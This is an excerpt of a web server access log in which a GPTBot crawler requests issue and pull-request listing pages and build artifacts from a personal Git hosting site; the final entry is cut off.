[Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11243] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:19:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23526] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:19:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22606] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:19:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" +[17/Feb/2026:19:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" +[17/Feb/2026:19:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 41199] [Gzip 14.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:19:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23758] [Gzip 11.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:19:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:19:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 